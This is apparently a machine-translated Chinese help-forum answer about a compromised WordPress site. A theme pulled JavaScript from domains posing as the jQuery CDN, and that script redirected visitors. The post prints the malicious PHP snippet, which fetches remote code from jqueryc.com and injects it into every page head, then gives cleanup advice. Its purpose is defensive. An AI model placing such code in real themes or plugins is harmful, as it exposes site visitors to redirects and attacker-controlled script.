写下所有评论作为答案,因为这里有很好的信息来对抗漏洞利用。
问题
在 Wordpress 驱动的站点的源代码中发现了一个带有冒充 jQuery CDN 的 URL 的脚本。听起来 jquerys.com 和 jqueryc.com 都被用作冒名顶替的域。
恶意代码很简单;它随机重定向到另一个站点并设置一个 cookie 以防止立即重定向(每天一次)。由于它不常见,因此在开发站点时可能永远不会看到它,或者忽略它。
可能的原因
- 输入网址错误
- 受损的服务器
- 恶意主题
- 一个恶意插件
解析度
开始:http ://codex.wordpress.org/FAQ_My_site_was_hacked
OP 在主题中找到了这段代码:
// !!! Suspect Code - Do not use for any purpose !!!
//Jquery Function
if (!function_exists('insert_jquery_theme')){
function insert_jquery_theme(){
if (function_exists('curl_init')){
$url="jqueryc.com/jquery-1.6.3.min.js";
$ch = curl_init();
$timeout = 5;
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
$data = curl_exec($ch);
curl_close($ch);
echo $data;
}
}
add_action('wp_head', 'insert_jquery_theme');
}
查看源码,其实有两个对jQuery的引用;一种合法,一种不合法。删除上述代码片段可以解决问题。
确定恶意代码的来源(例如主题、插件或受感染的服务器)仍然很重要。如果不检查它们是否存在恶意代码,则不应恢复备份。
相关链接